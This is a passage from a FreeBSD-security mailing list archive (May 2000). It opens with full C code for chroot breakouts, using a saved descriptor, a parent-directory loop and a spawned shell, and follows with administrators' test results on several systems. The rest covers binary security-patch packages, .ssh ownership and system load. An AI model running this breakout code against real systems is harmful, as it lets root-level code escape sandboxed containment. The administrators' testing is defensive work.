>     assert(chdir("/") != -1);
>     assert(chroot(lowerdir) != -1);
>     for (i = 0; i < 32; i++)
>         assert(chdir("..") != -1);
>     assert(chroot(".") != -1);
>
>     assert(execl(shell, shell, (char *)NULL) != -1);
> }

What about the "other" chroot-breakout, does it still work under FreeBSD 4.0? Here's the breakout-code modulo checks whether /tmp exists etc.

#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    int handle, i;

    /* keep a descriptor for the current root open across the chroot */
    handle = open("/", O_RDONLY);
    chroot("/tmp");
    chdir("/");
    /* return to the directory outside the new root through the saved descriptor */
    fchdir(handle);
    for (i = 0; i < 32; i++)
        chdir("..");
    chroot(".");
    chdir("/");
    system("/bin/sh");
    return 0;
}

bye, Harold -- Someone should do a study to find out how many human life spans have been lost waiting for NT to reboot. Ken Deboy on Dec 24 1999 in comp.unix.bsd.freebsd.misc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 11:30:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 2DFD737B59E; Fri, 12 May 2000 11:30:42 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id LAA07552; Fri, 12 May 2000 11:32:26 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Robert Watson Cc: Derek Werthmuller , freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-reply-to: Your message of "Fri, 12 May 2000 12:40:04 EDT." Date: Fri, 12 May 2000 11:32:26 -0700 Message-ID: <7549.958156346@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > For patches where it's appropriate, I've been strongly considering > releasing "packages" that update the key parts of the base OS for security > fixes. 
This would be similar to the BSD/OS patch level support for fixes, > although restricted only to security stuff. This would provide access to > security fixes for non-source-centric sites, which I think is important. > With 4.0 I haven't had the opportunity to exercise this possibility as > yet. :-) > > I.e., > > pkg_add secpatch_4.0-RELEASE_001.tgz That would be cool if we could also somehow automate the process, since people will come to depend on it as an upgrade process. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 11:52:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 8919937B8AF; Fri, 12 May 2000 11:52:40 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id OAA89027; Fri, 12 May 2000 14:52:27 -0400 (EDT) From: Igor Roshchin Message-Id: <200005121852.OAA89027@giganda.komkon.org> Subject: Re: Applying patches with out a compiler In-Reply-To: from "David Pick" at "May 12, 2000 06:46:00 pm" To: "David Pick" Date: Fri, 12 May 2000 14:52:26 -0400 (EDT) Cc: "Robert Watson" , freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > For patches where it's appropriate, I've been strongly considering > > releasing "packages" that update the key parts of the base OS for security > > fixes. This would be similar to the BSD/OS patch level support for fixes, > > although restricted only to security stuff. This would provide access to > > security fixes for non-source-centric sites, which I think is important. 
> > With 4.0 I haven't had the opportunity to exercise this possibility as > > yet. :-) > > > > I.e., > > > > pkg_add secpatch_4.0-RELEASE_001.tgz > > > > Would replace the faulty binaries with better ones, and leave behind a > > package install record so you could easily determine which security > > patches are installed. And if appropriate, could back up the original > > binaries allowing pkg_delete to restore the original state. > > > > Any thoughts on this? > > Very useful. > > A few points: > - We'd need to allow for USA/international versions, preferably with > different names. Perhaps a third "set" of names for the "patches" > that are independent of geography: > - secpatch_4.0-RELEASE_global-001 > - secpatch_4.0-RELEASE_international-001 > - secpatch_4.0-RELEASE_USAonly-001 > - The automatic dependency system would be magic, especially if there > was a "top level" package listing the latest "patches" > - possibly another "set" containing *source* patches for the kernel > only, for the sites who need to rebuild the kernel but carry no > other sources, to make the installation of these important patches > easier and hence more likely to happen > > A few questions: > - should each "patch" package have all the previous ones as dependencies? > - most package names seem to use the convention of a basic name, a hyphen, > then the version number; does this really matter so the package names > would need to be modified slightly? > - how sensitive can the system be made to the fact that different combinations > of distribution sets give different sets of binary programs: there's the > international/USA versions, but (as I've just realised), there's also > the issue of kerberos/non-kerberos versions of some binaries. > > -- > David Pick > > > To add a question/suggestion: Would it be possible to take into account the variation of the system version, say, if the system was installed not from the -RELEASE, but from a snapshot ? 
Here is what I mean: I know that if you are trying to install packages on such system using /stand/sysinstall, and trying to connect not to releng4.freebsd.org, but to any other site, the program obviously couldn't find the corresponding distribution, and one has to either change the name of the distribution manually, or go to releng4, even though it doesn't seem to matter for packages. It would be nice to avoid such annoyance with the binary patches system suggested. Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 12: 1:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id BB3B737B715 for ; Fri, 12 May 2000 12:01:25 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id PAA49430; Fri, 12 May 2000 15:00:47 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 12 May 2000 15:00:47 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Igor Roshchin Cc: David Pick , freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-Reply-To: <200005121852.OAA89027@giganda.komkon.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One of the simplifying assumptions here that makes the whole idea of binary security updates feasible is that you are working from a well-known code base. The service I'm willing to provide (and have time to provide) would specifically target the most recent -RELEASE version, and be intended to apply on an otherwise un-modified system. 
I would provide both KerberosIV and non-Kerberos versions, as I support Kerberos on some of my own machines; however, if it's going to get any more complicated than that, I don't have time to implement it, but would be glad for someone else to pick up the project. My thoughts on dependencies, et al, have been: 1) Binary patches will only be available against the most recent -RELEASE 2) Binary patch packages will depend on all prior binary patches being installed 3) Source patches used to build the binary patched version seem like a good idea. All of this is centered on requiring a very well-defined environment, in which the patch will not break other patches installed, introduce new holes, et al. As I said above, anything more complicated requires rethinking, and should be done in the context of source revision control, etc. This addresses only security concerns; if we want sliding version management in a binary manner across -STABLE, that's another target for another project :-). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 12:14:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id 43A0F37B511; Fri, 12 May 2000 12:14:38 -0700 (PDT) (envelope-from brad@testbed.baileylink.net) Received: (from brad@localhost) by testbed.baileylink.net (8.9.3/8.9.3) id OAA09614; Fri, 12 May 2000 14:15:26 -0500 (CDT) (envelope-from brad) Date: Fri, 12 May 2000 14:15:26 -0500 From: Brad Guillory To: Robert Watson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler Message-ID: <20000512141525.F77275@baileylink.net> References: 
<200005121852.OAA89027@giganda.komkon.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from rwatson@FreeBSD.ORG on Fri, May 12, 2000 at 03:00:47PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert, I think that you have sound goals and achievable objectives, the ingredients for a successful project. To accommodate the other camps (international version users for instance) I suggest that you make any tools and methodologies that you develop for the project available. You might consider your dependency stance. It would probably be easier for you to simply maintain a single package with incremental version numbers where each version contains all the fixes. I suspect that the number of binaries that will change over the course of a release will be minor. The usefulness of this project will probably be very limited if you do not address the kernel issue. Many security fixes that I have seen since I joined the list have been in the form of kernel patches. Good luck, BMG On Fri, May 12, 2000 at 03:00:47PM -0400, Robert Watson wrote: > > One of the simplifying assumptions here that makes the whole idea of binary > security updates feasible is that you are working from a well-known code > base. The service I'm willing to provide (and have time to provide) would > specifically target the most recent -RELEASE version, and be intended to > apply on an otherwise un-modified system. I would provide both KerberosIV > and non-Kerberos versions, as I support Kerberos on some of my own > machines; however, if it's going to get any more complicated than that, I > don't have time to implement it, but would be glad for someone else to > pick up the project. 
> > My thoughts on dependencies, et al, have been: > > 1) Binary patches will only be available against the most recent -RELEASE > 2) Binary patch packages will depend on all prior binary patches being > installed > 3) Source patches used to build the binary patched version seem like a good > idea. > > All of this is centered on requiring a very well-defined environment, in > which the patch will not break other patches installed, introduce new > holes, et al. As I said above, anything more complicated requires > rethinking, and should be done in the context of source revision control, > etc. This addresses only security concerns; if we want sliding version > management in a binary manner across -STABLE, that's another target for > another project :-). > > Robert N M Watson > > robert@fledge.watson.org http://www.watson.org/~robert/ > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 > TIS Labs at Network Associates, Safeport Network Services > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- __O _-\<,_ Why drive when you can bike? 
(_)/ (_) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 12 12:42:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from ctg-nt.ctg.albany.edu (ctg-nt.ctg.albany.edu [169.226.80.32]) by hub.freebsd.org (Postfix) with ESMTP id E7D2F37BE8C; Fri, 12 May 2000 12:42:41 -0700 (PDT) (envelope-from dwerthmu@ctg.albany.edu) Received: by ctg-nt.ctg.albany.edu with Internet Mail Service (5.5.2650.21) id ; Fri, 12 May 2000 15:44:15 -0400 Message-ID: <7A71D0D43B9ED1119EC10008C756C3042F7703@ctg-nt.ctg.albany.edu> From: Derek Werthmuller To: 'Robert Watson' Cc: freebsd-security@FreeBSD.ORG Subject: RE: Applying patches with out a compiler Date: Fri, 12 May 2000 15:44:07 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This could really take the OS to a new level of management, ease of use and potentially increase its use in the industry (which I believe is a goal). The pkg_add utilities work great, why not expand an already successful component. As far as using it to update the version of the OS to a new release, then this would be a great next step. I know for me, in the past when I went from one version to the next I rebuilt the system, the source upgrade has had its problems for me. Derek -----Original Message----- From: Robert Watson [mailto:rwatson@FreeBSD.ORG] Sent: Friday, May 12, 2000 12:40 PM To: Derek Werthmuller Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler On Thu, 11 May 2000, Derek Werthmuller wrote: > I'm interested in applying standard "Release" versions of FreeBSD without > using a compiler in the system. I generally don't advise leaving a working > compiler in say a firewall or a hardened system. 
I know that I can have a > separate system that I can use to connect via CVS and use that to update the > hardened systems. But doesn't that just keep my sources up to date and I > still need to build/build world every so often? Is there another way to > apply the security related patches ? For patches where it's appropriate, I've been strongly considering releasing "packages" that update the key parts of the base OS for security fixes. This would be similar to the BSD/OS patch level support for fixes, although restricted only to security stuff. This would provide access to security fixes for non-source-centric sites, which I think is important. With 4.0 I haven't had the opportunity to exercise this possibility as yet. :-) I.e., pkg_add secpatch_4.0-RELEASE_001.tgz Would replace the faulty binaries with better ones, and leave behind a package install record so you could easily determine which security patches are installed. And if appropriate, could back up the original binaries allowing pkg_delete to restore the original state. Any thoughts on this? 
Robert N M Watson

robert@fledge.watson.org http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 13:17:43 2000
Delivered-To: freebsd-security@freebsd.org
Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 9800C37C00F for ; Fri, 12 May 2000 13:16:48 -0700 (PDT) (envelope-from jeff-ml@mountin.net)
Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id PAA23209; Fri, 12 May 2000 15:16:45 -0500 (CDT) (envelope-from jeff-ml@mountin.net)
Received: from dial-86.max1.wa.cyberlynk.net(207.227.118.86) by peak.mountin.net via smap (V1.3) id sma023206; Fri May 12 15:16:38 2000
Message-Id: <4.3.2.20000511222552.00c38dd0@207.227.119.2>
X-Sender: jeff-ml@207.227.119.2
X-Mailer: QUALCOMM Windows Eudora Version 4.3
Date: Thu, 11 May 2000 22:42:41 -0500
To: stanislav shalunov
From: "Jeffrey J. Mountin"
Subject: Re: envy.vuurwerk.nl daily run output
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <87snvo8ovq.fsf@sharik.worldnet.att.net>
References: <"Jeffrey J. Mountin"'s message of "Thu, 11 May 2000 20:10:41 -0500"> <20000509150609.L42267@vuurwerk.nl> <4.3.2.20000511192741.00c24ac0@207.227.119.2>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 10:48 PM 5/11/00 -0400, stanislav shalunov wrote:
>"Jeffrey J. Mountin" writes:
>
> > You could always force the ownership of .ssh/ and any files under it
> > to root.
>
>But the owner of the home directory can just "mv .ssh ssh-forget-me".
>If the user already has an authorized_keys file, he'd probably notice.
>Otherwise, especially if he doesn't ssh out from that machine or it
>has a good known_hosts file it can go unnoticed.

Whoops, forgot to add the flag so that it could not be deleted or removed.

>Or did you mean "...and check that ownership didn't change daily"?
>(They could move the directories around daily, too.)

No. Without the flags set, that would just create more work and do little for security.

Jeff Mountin - jeff@mountin.net
Systems/Network Administrator
FreeBSD - the power to serve

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 13:26:21 2000
Delivered-To: freebsd-security@freebsd.org
Received: from phoenix.aye.net (phoenix.aye.net [198.7.192.5]) by hub.freebsd.org (Postfix) with SMTP id 4E9CF37B75B for ; Fri, 12 May 2000 13:26:16 -0700 (PDT) (envelope-from barrett@aye.net)
Received: (qmail 25735 invoked by uid 1000); 12 May 2000 20:26:14 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 12 May 2000 20:26:14 -0000
Date: Fri, 12 May 2000 16:26:13 -0400 (EDT)
From: Barrett Richardson
To: Nazar Kulynych
Cc: security@FreeBSD.ORG
Subject: Re: high load
In-Reply-To: <00051113444502.00773@ix.register.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 11 May 2000, Nazar Kulynych wrote:

> when I do rm or tar -zxf the load gets up to 5.00
> on a pentium 200mmx with 48MB ram.
>
> I can't figure out what's going on
>
> Thanx in advance
>
>

Lots and lots of file creation/deletion probably causes lots and lots of synchronous meta-data updates.
- Barrett

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 13:51:15 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id EDF9737B595 for ; Fri, 12 May 2000 13:51:10 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id NAA28061; Fri, 12 May 2000 13:50:32 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda28059; Fri May 12 13:50:29 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id NAA63043; Fri, 12 May 2000 13:50:29 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdu63033; Fri May 12 13:49:45 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4CKnjU42033; Fri, 12 May 2000 13:49:45 -0700 (PDT)
Message-Id: <200005122049.e4CKnjU42033@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdG42029; Fri May 12 13:49:04 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.0-STABLE
X-Sender: cy
To: "Patrick Bihan-Faou"
Cc: "Cy Schubert - ITSD Open Systems Group" , freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
In-reply-to: Your message of "Fri, 12 May 2000 11:46:41 EDT."
    <0e8c01bfbc29$4432e390$040aa8c0@local.mindstep.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 12 May 2000 13:49:04 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <0e8c01bfbc29$4432e390$040aa8c0@local.mindstep.com>, "Patrick Bihan-Faou" writes:
> Hi,
>
> > I was about to comment that anyone with root can break out of any
> > chrooted environment including jail, however testing the break out of
> > jail exploit (good thing I tested before I spoke), which BTW worked on
> > FreeBSD-3 and numerous other platforms including Linux, Solaris, and
> > Tru64-UNIX, appears to no longer work under 4.0 -- which is a good
> > thing! When did the FreeBSD chroot(2) get fixed?
> >
> > Once again FreeBSD leads the way.
> >
> > Following is the break-out-of-jail code.
>
> I just tested the exploit code on a 3.4 system and a 4.0 system and my
> results are:
>
> - if I run the program as root, then the program runs properly: starts SH in /
> - if I run the program as !root, then the program fails to chroot back to
>   / (I guess this is the expected behaviour).
>
>
> For info:
>
> The FreeBSD 3.x machine:
>
> FreeBSD jacuzzi.local.mindstep.com 3.4-STABLE FreeBSD 3.4-STABLE #8: Thu Apr
> 27 00:13:41 EDT 2000
> patrick@jacuzzi.local.mindstep.com:/usr/src/sys/compile/JACUZZI i386
>
>
> The FreeBSD 4.0 machine:
>
> FreeBSD nitro 4.0-STABLE FreeBSD 4.0-STABLE #3: Fri Apr 21 15:10:09 EDT 2000
> patrick@nitro:/usr/src/sys/compile/NITRO i386
>
>
> So my question is: is the exploit really fixed? Or is it normal for root to
> be able to break loose from chroot?

I've been, as root, able to break out of jail with the posted code on FreeBSD-3.3, RH 5.2 & 6.0, Solaris 2.6, and Tru64-UNIX 4.0D. I've, as root, not been able to break out of jail on 4.0-STABLE as of April 22, hence suspected that FreeBSD plugged this hole.
Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 14: 0: 0 2000
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 8EF4C37B595; Fri, 12 May 2000 13:59:51 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id NAA28107; Fri, 12 May 2000 13:59:32 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda28103; Fri May 12 13:59:30 2000
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id NAA63096; Fri, 12 May 2000 13:59:30 -0700 (PDT)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdY63094; Fri May 12 13:58:45 2000
Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4CKwjt42087; Fri, 12 May 2000 13:58:45 -0700 (PDT)
Message-Id: <200005122058.e4CKwjt42087@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdx42078; Fri May 12 13:57:50 2000
X-Mailer: exmh version 2.1.1 10/15/1999
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.0-STABLE
X-Sender: cy
To: Robert Watson
Cc: Igor Roshchin , David Pick , freebsd-security@FreeBSD.ORG
Subject: Re: Applying patches with out a compiler
In-reply-to: Your message of "Fri, 12 May 2000 15:00:47 EDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 12 May 2000 13:57:50 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message , Robert Watson writes:
> My thoughts on dependencies, et al, have been:
>
> 1) Binary patches will only be available against the most recent -RELEASE
> 2) Binary patch packages will depend on all prior binary patches being
>    installed
> 3) Source patches used to build the binary patched version seem like a good
>    idea.

You've got my vote.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 14: 6: 0 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 5A70837B75B; Fri, 12 May 2000 14:05:50 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (ip43.salt-lake-city6.ut.pub-ip.psi.net [38.27.95.43]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id PAA00327; Fri, 12 May 2000 15:05:29 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <391C725F.CF89DA4A@softweyr.com>
Date: Fri, 12 May 2000 15:06:39 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: David Pick
Cc: Robert Watson , freebsd-security@FreeBSD.ORG
Subject: Re: Applying patches with out a compiler
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

David Pick wrote:
>
> > For patches where it's appropriate, I've been strongly considering
> > releasing "packages" that update the key parts of the base OS for security
> > fixes. This would be similar to the BSD/OS patch level support for fixes,
> > although restricted only to security stuff. This would provide access to
> > security fixes for non-source-centric sites, which I think is important.
> > With 4.0 I haven't had the opportunity to exercise this possibility as
> > yet. :-)
> >
> > I.e.,
> >
> >     pkg_add secpatch_4.0-RELEASE_001.tgz
> >
> > Would replace the faulty binaries with better ones, and leave behind a
> > package install record so you could easily determine which security
> > patches are installed. And if appropriate, could back up the original
> > binaries allowing pkg_delete to restore the original state.
> >
> > Any thoughts on this?
>
> Very useful.
>
> A few points:
> - We'd need to allow for USA/international versions, preferably with
>   different names. Perhaps a third "set" of names for the "patches"
>   that are independent of geography:
>     - secpatch_4.0-RELEASE_global-001
>     - secpatch_4.0-RELEASE_international-001
>     - secpatch_4.0-RELEASE_USAonly-001

Ugh. There's gotta be a better way. Please read below.

> - The automatic dependency system would be magic, especially if there
>   was a "top level" package listing the latest "patches"

Yeah, yeah, we could call them "Service Packs." Or not.

> - possibly another "set" containing *source* patches for the kernel
>   only, for the sites who need to rebuild the kernel but carry no
>   other sources, to make the installation of these important patches
>   easier and hence more likely to happen
>
> A few questions:
> - should each "patch" package have all the previous ones as dependencies?

Only the ones this patch really depends on.

> - most package names seem to use the convention of a basic name, a hyphen,
>   then the version number; does this really matter so the package names
>   would need to be modified slightly?

I think the version numbers are part of the dependency magic, but haven't verified this.
> - how sensitive can the system be made to the fact that different combinations
>   of distribution sets give different sets of binary programs: there's the
>   international/USA versions, but (as I've just realised), there's also
>   the issue of kerberos/non-kerberos versions of some binaries.

Ick.

I'd like to point out that Jordan is trying very very hard to solve these problems, and others, for real. Attempting to extend what we have now is probably not the best way to carry on. The project Jordan wishes to muster would address all the issues we've covered above, and others like what happens when the config file format changes between versions (automagically suck the settings out of the old one and put them into the new one is the RIGHT answer), and adding new entries into existing files, and ripping them back out when downgrading.

If you're really interested in helping with the real effort, email jkh@freebsd.org and tell him you want to join the fun. He might even have an employment opportunity for you. ;^)

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                     Softweyr LLC
wes@softweyr.com                       http://softweyr.com/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 14:18:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from orion.ac.hmc.edu (Orion.AC.HMC.Edu [134.173.32.20]) by hub.freebsd.org (Postfix) with ESMTP id 9880A37BA93 for ; Fri, 12 May 2000 14:18:38 -0700 (PDT) (envelope-from brdavis@orion.ac.hmc.edu)
Received: (from brdavis@localhost) by orion.ac.hmc.edu (8.8.8/8.8.8) id OAA04296; Fri, 12 May 2000 14:18:24 -0700 (PDT)
Date: Fri, 12 May 2000 14:18:24 -0700
From: Brooks Davis
To: Cy Schubert - ITSD Open Systems Group
Cc: Patrick Bihan-Faou , freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
Message-ID: <20000512141824.A748@orion.ac.hmc.edu>
References: <0e8c01bfbc29$4432e390$040aa8c0@local.mindstep.com> <200005122049.e4CKnjU42033@cwsys.cwsent.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0pre4i
In-Reply-To: <200005122049.e4CKnjU42033@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Fri, May 12, 2000 at 01:49:04PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, May 12, 2000 at 01:49:04PM -0700, Cy Schubert - ITSD Open Systems Group wrote:
> I've been, as root, able to break out of jail with the posted code on
> FreeBSD-3.3, RH 5.2 & 6.0, Solaris 2.6, and Tru64-UNIX 4.0D. I've, as
> root, not been able to break out of jail on 4.0-STABLE as of April 22,
> hence suspected that FreeBSD plugged this hole.

chroot != jail. chroot'ed programs are often described as running in jails, but they are certainly in minimum security prisons at best. The new jail(8) feature in FreeBSD 4.0 written by PHK and documented by Robert Watson is an entirely different beast and it's certainly what was suggested in the post that prompted this conversation.
The very short introduction to jail is that it's a maximum security version of chroot. It's almost as good as a whole separate machine.

-- Brooks

--
Any statement of the form "X is the one, true Y" is FALSE.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 15:18:31 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 0109C37B813; Fri, 12 May 2000 15:18:26 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (ip43.salt-lake-city6.ut.pub-ip.psi.net [38.27.95.43]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id QAA00457; Fri, 12 May 2000 16:17:58 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <391C8366.C63B2B44@softweyr.com>
Date: Fri, 12 May 2000 16:19:18 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Brad Guillory
Cc: Robert Watson , freebsd-security@FreeBSD.ORG
Subject: Re: Applying patches with out a compiler
References: <200005121852.OAA89027@giganda.komkon.org> <20000512141525.F77275@baileylink.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Brad Guillory wrote:
>
> I think that you have sound goals and achievable objectives, the ingredients
> for a successful project. To accommodate the other camps (international
> version users for instance) I suggest that you make any tools and methodologies
> that you develop for the project available.

Yes, this does sound like a workable plan, and is in fact exactly what I'm creating for DoBox. I'm certainly glad to share whatever code I write to support this, though the mechanisms may differ somewhat.

> You might consider your dependency stance.
> It would probably be easier for
> you to simply maintain a single package with incremental version numbers
> where each version contains all the fixes. I suspect that the number of
